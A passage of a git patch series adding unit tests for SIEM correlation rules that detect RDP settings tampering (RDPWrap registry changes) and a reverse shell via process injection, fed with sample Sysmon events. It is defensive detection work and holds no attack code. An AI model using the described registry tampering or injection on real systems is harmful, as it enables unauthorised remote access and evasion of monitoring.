"c:\\windows\\system32\\netsh.exe", "object.process.id": "3328", "object.process.name": "netsh.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "object.process.parent.id": "2300", "object.process.parent.name": "powershell.exe", "object.process.parent.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\", "object.process.path": "c:\\windows\\system32\\", "status": "success", "subject": "account", "subject.account.domain": "lab", "subject.account.id": "S-1-5-21-1840087645-2506612525-4240436938-1000", "subject.account.name": "admin", "subject.account.privileges": "TokenElevationTypeDefault", "subject.account.session_id": "336094"} From 2544e5f5edfd077489376dc2bd66b94c82620a82 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Mon, 31 Jul 2023 12:06:59 +0300 Subject: [PATCH 24/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(RDP=5Fse?= =?UTF-8?q?ttings=5Ftampering)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../RDP_settings_tampering/tests/test_1.sc | 4 ++++ .../RDP_settings_tampering/tests/test_2.sc | 4 ++++ .../RDP_settings_tampering/tests/test_3.sc | 4 ++++ .../RDP_settings_tampering/tests/test_4.sc | 4 ++++ 4 files changed, 16 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/RDP_settings_tampering/tests/test_1.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/RDP_settings_tampering/tests/test_2.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/RDP_settings_tampering/tests/test_3.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/RDP_settings_tampering/tests/test_4.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/RDP_settings_tampering/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/RDP_settings_tampering/tests/test_1.sc new file mode 100644 index 00000000..f274b0e8 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/RDP_settings_tampering/tests/test_1.sc @@ -0,0 +1,4 @@ +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"13\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"13\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-03-17T20:18:05.0865600Z\"},\"EventRecordID\":\"5265\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1852\",\"ThreadID\":\"464\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"PC04.example.corp\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"EventType\",\"text\":\"SetValue\"},{\"Name\":\"UtcTime\",\"text\":\"2019-03-17 20:18:05.086\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-ab70-5c8e-0000-0010df1f0a00}\"},{\"Name\":\"ProcessId\",\"text\":\"3700\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\RDPWrap-v1.6.2\\\\RDPWInst.exe\"},{\"Name\":\"TargetObject\",\"text\":\"HKLM\\\\System\\\\CurrentControlSet\\\\services\\\\TermService\\\\Parameters\\\\ServiceDll\"},{\"Name\":\"Details\",\"text\":\"%%ProgramFiles%%\\\\RDP Wrapper\\\\rdpwrap.dll\"}]}}}", "category.generic": "Registry Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "pc04.example.corp", "event_src.host": "pc04.example.corp", "event_src.hostname": "pc04", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_13_Registry_value_changed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "13", "normalized": true, "object": "reg_object", "object.fullpath": "\\registry\\machine\\system\\currentcontrolset\\services\\termservice\\parameters\\servicedll", "object.name": "servicedll", "object.new_value": "%%programfiles%%\\rdp wrapper\\rdpwrap.dll", "object.path": "\\registry\\machine\\system\\currentcontrolset\\services\\termservice\\parameters\\", "object.property": "value", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-09T13:53:16.260Z", "status": "success", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\rdpwrap-v1.6.2\\rdpwinst.exe", "subject.process.guid": "365abb72-ab70-5c8e-0000-0010df1f0a00", "subject.process.id": "3700", "subject.process.name": "rdpwinst.exe", "subject.process.path": "c:\\users\\ieuser\\desktop\\rdpwrap-v1.6.2\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-03-17T20:18:05.086Z", "type": "raw", "uuid": "dd0243d2-ccb8-4ca7-911a-4ec0c4bc9dac"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "modify", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Modify Registry", "correlation_name": "RDP_settings_tampering", "correlation_type": "incident", "event_src.category": "Other", "event_src.fqdn": "pc04.example.corp", "event_src.host": "pc04.example.corp", "event_src.hostname": "pc04", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "RDP_settings_tampering|pc04.example.corp|rdpwinst.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "reg_object", "object.fullpath": "\\registry\\machine\\system\\currentcontrolset\\services\\termservice\\parameters\\servicedll", "object.name": "servicedll", "object.new_value": "%%programfiles%%\\rdp wrapper\\rdpwrap.dll", "object.path": "\\registry\\machine\\system\\currentcontrolset\\services\\termservice\\parameters\\", "object.property": "value", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\rdpwrap-v1.6.2\\rdpwinst.exe", "subject.process.guid": "365abb72-ab70-5c8e-0000-0010df1f0a00", "subject.process.id": "3700", "subject.process.name": "rdpwinst.exe", "subject.process.path": "c:\\users\\ieuser\\desktop\\rdpwrap-v1.6.2\\"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/RDP_settings_tampering/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/RDP_settings_tampering/tests/test_2.sc new file mode 100644 index 00000000..c4689d4d --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/RDP_settings_tampering/tests/test_2.sc @@ -0,0 +1,4 @@ +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"13\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"13\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-03-17T20:18:09.2825936Z\"},\"EventRecordID\":\"5267\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1852\",\"ThreadID\":\"464\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"PC04.example.corp\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"EventType\",\"text\":\"SetValue\"},{\"Name\":\"UtcTime\",\"text\":\"2019-03-17 20:18:09.272\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-ab70-5c8e-0000-0010df1f0a00}\"},{\"Name\":\"ProcessId\",\"text\":\"3700\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\RDPWrap-v1.6.2\\\\RDPWInst.exe\"},{\"Name\":\"TargetObject\",\"text\":\"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\fDenyTSConnections\"},{\"Name\":\"Details\",\"text\":\"DWORD (0x00000000)\"}]}}}", "category.generic": "Registry Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "pc04.example.corp", "event_src.host": "pc04.example.corp", "event_src.hostname": "pc04", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_13_Registry_value_changed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "13", "normalized": true, "object": "reg_object", "object.fullpath": "\\registry\\machine\\system\\currentcontrolset\\control\\terminal server\\fdenytsconnections", "object.name": "fdenytsconnections", "object.new_value": "dword (0x00000000)", "object.path": "\\registry\\machine\\system\\currentcontrolset\\control\\terminal server\\", "object.property": "value", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-09T13:53:16.261Z", "status": "success", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\rdpwrap-v1.6.2\\rdpwinst.exe", "subject.process.guid": "365abb72-ab70-5c8e-0000-0010df1f0a00", "subject.process.id": "3700", "subject.process.name": "rdpwinst.exe", "subject.process.path": "c:\\users\\ieuser\\desktop\\rdpwrap-v1.6.2\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-03-17T20:18:09.272Z", "type": "raw", "uuid": "042a584e-5bfa-4c75-b574-165cf5945c37"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "modify", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Modify Registry", "correlation_name": "RDP_settings_tampering", "correlation_type": "incident", "event_src.category": "Other", "event_src.fqdn": "pc04.example.corp", "event_src.host": "pc04.example.corp", "event_src.hostname": "pc04", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "RDP_settings_tampering|pc04.example.corp|rdpwinst.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "reg_object", "object.fullpath": "\\registry\\machine\\system\\currentcontrolset\\control\\terminal server\\fdenytsconnections", "object.name": "fdenytsconnections", "object.new_value": "dword (0x00000000)", "object.path": "\\registry\\machine\\system\\currentcontrolset\\control\\terminal server\\", "object.property": "value", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\rdpwrap-v1.6.2\\rdpwinst.exe", "subject.process.guid": "365abb72-ab70-5c8e-0000-0010df1f0a00", "subject.process.id": "3700", "subject.process.name": "rdpwinst.exe", "subject.process.path": "c:\\users\\ieuser\\desktop\\rdpwrap-v1.6.2\\"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/RDP_settings_tampering/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/RDP_settings_tampering/tests/test_3.sc new file mode 100644 index 00000000..3d2f053d --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/RDP_settings_tampering/tests/test_3.sc @@ -0,0 +1,4 @@ +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"13\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"13\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-03-17T20:18:09.2825936Z\"},\"EventRecordID\":\"5269\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1852\",\"ThreadID\":\"464\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"PC04.example.corp\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"EventType\",\"text\":\"SetValue\"},{\"Name\":\"UtcTime\",\"text\":\"2019-03-17 20:18:09.272\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-ab70-5c8e-0000-0010df1f0a00}\"},{\"Name\":\"ProcessId\",\"text\":\"3700\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\RDPWrap-v1.6.2\\\\RDPWInst.exe\"},{\"Name\":\"TargetObject\",\"text\":\"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\Licensing Core\\\\EnableConcurrentSessions\"},{\"Name\":\"Details\",\"text\":\"DWORD (0x00000001)\"}]}}}", "category.generic": "Registry Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "pc04.example.corp", "event_src.host": "pc04.example.corp", "event_src.hostname": "pc04", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_13_Registry_value_changed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "13", "normalized": true, "object": "reg_object", "object.fullpath": "\\registry\\machine\\system\\currentcontrolset\\control\\terminal server\\licensing core\\enableconcurrentsessions", "object.name": "enableconcurrentsessions", "object.new_value": "dword (0x00000001)", "object.path": "\\registry\\machine\\system\\currentcontrolset\\control\\terminal server\\licensing core\\", "object.property": "value", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-09T13:53:16.262Z", "status": "success", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\rdpwrap-v1.6.2\\rdpwinst.exe", "subject.process.guid": "365abb72-ab70-5c8e-0000-0010df1f0a00", "subject.process.id": "3700", "subject.process.name": "rdpwinst.exe", "subject.process.path": "c:\\users\\ieuser\\desktop\\rdpwrap-v1.6.2\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-03-17T20:18:09.272Z", "type": "raw", "uuid": "4f326860-a9e1-43a4-9e16-8faa24a004b8"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "modify", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Modify Registry", "correlation_name": "RDP_settings_tampering", "correlation_type": "incident", "event_src.category": "Other", "event_src.fqdn": "pc04.example.corp", "event_src.host": "pc04.example.corp", "event_src.hostname": "pc04", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "RDP_settings_tampering|pc04.example.corp|rdpwinst.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "reg_object", "object.fullpath": "\\registry\\machine\\system\\currentcontrolset\\control\\terminal server\\licensing core\\enableconcurrentsessions", "object.name": "enableconcurrentsessions", "object.new_value": "dword (0x00000001)", "object.path": "\\registry\\machine\\system\\currentcontrolset\\control\\terminal server\\licensing core\\", "object.property": "value", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\rdpwrap-v1.6.2\\rdpwinst.exe", "subject.process.guid": "365abb72-ab70-5c8e-0000-0010df1f0a00", "subject.process.id": "3700", "subject.process.name": "rdpwinst.exe", "subject.process.path": "c:\\users\\ieuser\\desktop\\rdpwrap-v1.6.2\\"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/RDP_settings_tampering/tests/test_4.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/RDP_settings_tampering/tests/test_4.sc new file mode 100644 index 00000000..ec5ae65e --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/RDP_settings_tampering/tests/test_4.sc @@ -0,0 +1,4 @@ +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"13\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"13\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-03-17T20:22:59.3997616Z\"},\"EventRecordID\":\"5329\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1852\",\"ThreadID\":\"464\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"PC04.example.corp\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"EventType\",\"text\":\"SetValue\"},{\"Name\":\"UtcTime\",\"text\":\"2019-03-17 20:22:59.399\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-ac79-5c8e-0000-0010e1b50d00}\"},{\"Name\":\"ProcessId\",\"text\":\"2872\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\regedit.exe\"},{\"Name\":\"TargetObject\",\"text\":\"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\PortNumber\"},{\"Name\":\"Details\",\"text\":\"DWORD (0x00000050)\"}]}}}", "category.generic": "Registry Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "pc04.example.corp", "event_src.host": "pc04.example.corp", "event_src.hostname": "pc04", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_13_Registry_value_changed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "13", "normalized": true, "object": "reg_object", "object.fullpath": "\\registry\\machine\\system\\currentcontrolset\\control\\terminal server\\winstations\\rdp-tcp\\portnumber", "object.name": "portnumber", "object.new_value": "dword (0x00000050)", "object.path": "\\registry\\machine\\system\\currentcontrolset\\control\\terminal server\\winstations\\rdp-tcp\\", "object.property": "value", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-09T13:53:16.262Z", "status": "success", "subject.process.fullpath": "c:\\windows\\regedit.exe", "subject.process.guid": "365abb72-ac79-5c8e-0000-0010e1b50d00", "subject.process.id": "2872", "subject.process.name": "regedit.exe", "subject.process.path": "c:\\windows\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-03-17T20:22:59.399Z", "type": "raw", "uuid": "b011e315-09fa-46b6-a030-b6deebb3a715"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "modify", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Modify Registry", "correlation_name": "RDP_settings_tampering", "correlation_type": "incident", "event_src.category": "Other", "event_src.fqdn": "pc04.example.corp", "event_src.host": "pc04.example.corp", "event_src.hostname": "pc04", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "RDP_settings_tampering|pc04.example.corp|regedit.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "reg_object", "object.fullpath": "\\registry\\machine\\system\\currentcontrolset\\control\\terminal server\\winstations\\rdp-tcp\\portnumber", "object.name": "portnumber", "object.new_value": "dword (0x00000050)", "object.path": "\\registry\\machine\\system\\currentcontrolset\\control\\terminal server\\winstations\\rdp-tcp\\", "object.property": "value", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\regedit.exe", "subject.process.guid": "365abb72-ac79-5c8e-0000-0010e1b50d00", "subject.process.id": "2872", "subject.process.name": "regedit.exe", "subject.process.path": "c:\\windows\\"} From 3f12eabfb0f028326cabc9e110ad8db66845d4e5 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Mon, 31 Jul 2023 12:11:30 +0300 Subject: [PATCH 25/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82=20=D0=B4=D0=BB=D1=8F=20=D0=BF?= =?UTF-8?q?=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(ReverseShell=5Fcreated?= =?UTF-8?q?=5Fvia=5FPEInjection)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../ReverseShell_created_via_PEInjection/tests/test_1.sc | 6 ++++++ 1 file changed, 6 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/ReverseShell_created_via_PEInjection/tests/test_1.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/ReverseShell_created_via_PEInjection/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/ReverseShell_created_via_PEInjection/tests/test_1.sc new file mode 100644 index 00000000..f00572e2 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/ReverseShell_created_via_PEInjection/tests/test_1.sc @@ -0,0 +1,6 @@ +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"10\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"10\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-07-03T20:39:30.2547335Z\"},\"EventRecordID\":\"8353\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"112\",\"ThreadID\":\"2084\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-07-03 20:39:30.254\"},{\"Name\":\"SourceProcessGUID\",\"text\":\"{365abb72-1256-5d1d-0000-0010fb1a1b00}\"},{\"Name\":\"SourceProcessId\",\"text\":\"1632\"},{\"Name\":\"SourceThreadId\",\"text\":\"3148\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\notepad.exe\"},{\"Name\":\"TargetProcessGUID\",\"text\":\"{365abb72-1282-5d1d-0000-0010dd401b00}\"},{\"Name\":\"TargetProcessId\",\"text\":\"2328\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\rundll32.exe\"},{\"Name\":\"GrantedAccess\",\"text\":\"0x1fffff\"},{\"Name\":\"CallTrace\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+4530c|C:\\\\Windows\\\\system32\\\\kernel32.dll+51133|C:\\\\Windows\\\\system32\\\\kernel32.dll+5cc37|C:\\\\Windows\\\\system32\\\\kernel32.dll+20ae|UNKNOWN(0053108F)|UNKNOWN(00531147)|UNKNOWN(0054001F)|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+63618|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+635eb\"}]}}}", "category.generic": "Process", "category.high": "System Management", "category.low": "Manipulation", "datafield5": "3148", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+4530c|C:\\Windows\\system32\\kernel32.dll+51133|C:\\Windows\\system32\\kernel32.dll+5cc37|C:\\Windows\\system32\\kernel32.dll+20ae|UNKNOWN(0053108F)|UNKNOWN(00531147)|UNKNOWN(0054001F)|C:\\Windows\\SYSTEM32\\ntdll.dll+63618|C:\\Windows\\SYSTEM32\\ntdll.dll+635eb", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_10_Process_access", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "10", "normalized": true, "object": "process", "object.process.fullpath": "c:\\windows\\system32\\rundll32.exe", "object.process.guid": "365abb72-1282-5d1d-0000-0010dd401b00", "object.process.id": "2328", "object.process.name": "rundll32.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x1fffff", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-06T15:52:44.702Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\notepad.exe", "subject.process.guid": "365abb72-1256-5d1d-0000-0010fb1a1b00", "subject.process.id": "1632", "subject.process.name": "notepad.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-07-03T20:39:30.254Z", "type": "raw", "uuid": "e4b792cd-d9e2-4367-823e-f9405c1296c3"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-07-03T20:39:30.2547335Z\"},\"EventRecordID\":\"8352\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"112\",\"ThreadID\":\"2084\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-07-03 20:39:30.254\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-1282-5d1d-0000-0010dd401b00}\"},{\"Name\":\"ProcessId\",\"text\":\"2328\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\rundll32.exe\"},{\"Name\":\"FileVersion\",\"text\":\"6.1.7600.16385 (win7_rtm.090713-1255)\"},{\"Name\":\"Description\",\"text\":\"Windows host process (Rundll32)\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"rundll32.exe\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Users\\\\IEUser\\\\\"},{\"Name\":\"User\",\"text\":\"IEWIN7\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{365abb72-0a6f-5d1d-0000-0020ca350100}\"},{\"Name\":\"LogonId\",\"text\":\"0x135ca\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{365abb72-1256-5d1d-0000-0010fb1a1b00}\"},{\"Name\":\"ParentProcessId\",\"text\":\"1632\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\notepad.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\notepad.exe\\\"\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "365abb72-0a6f-5d1d-0000-0020ca350100", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", 